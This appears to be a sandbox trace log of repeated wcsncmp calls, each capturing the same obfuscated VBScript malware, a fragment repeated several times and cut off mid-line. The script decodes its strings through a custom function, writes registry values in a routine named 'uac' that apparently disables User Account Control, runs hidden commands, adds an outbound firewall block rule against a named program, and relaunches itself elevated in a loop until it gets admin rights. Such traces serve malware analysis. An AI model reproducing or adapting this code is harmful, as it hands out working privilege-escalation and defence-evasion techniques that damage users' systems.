bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.991] wcsncmp (_String1="\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.991] wcsncmp (_String1="LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.991] wcsncmp (_String1="DSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.991] wcsncmp (_String1="SDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 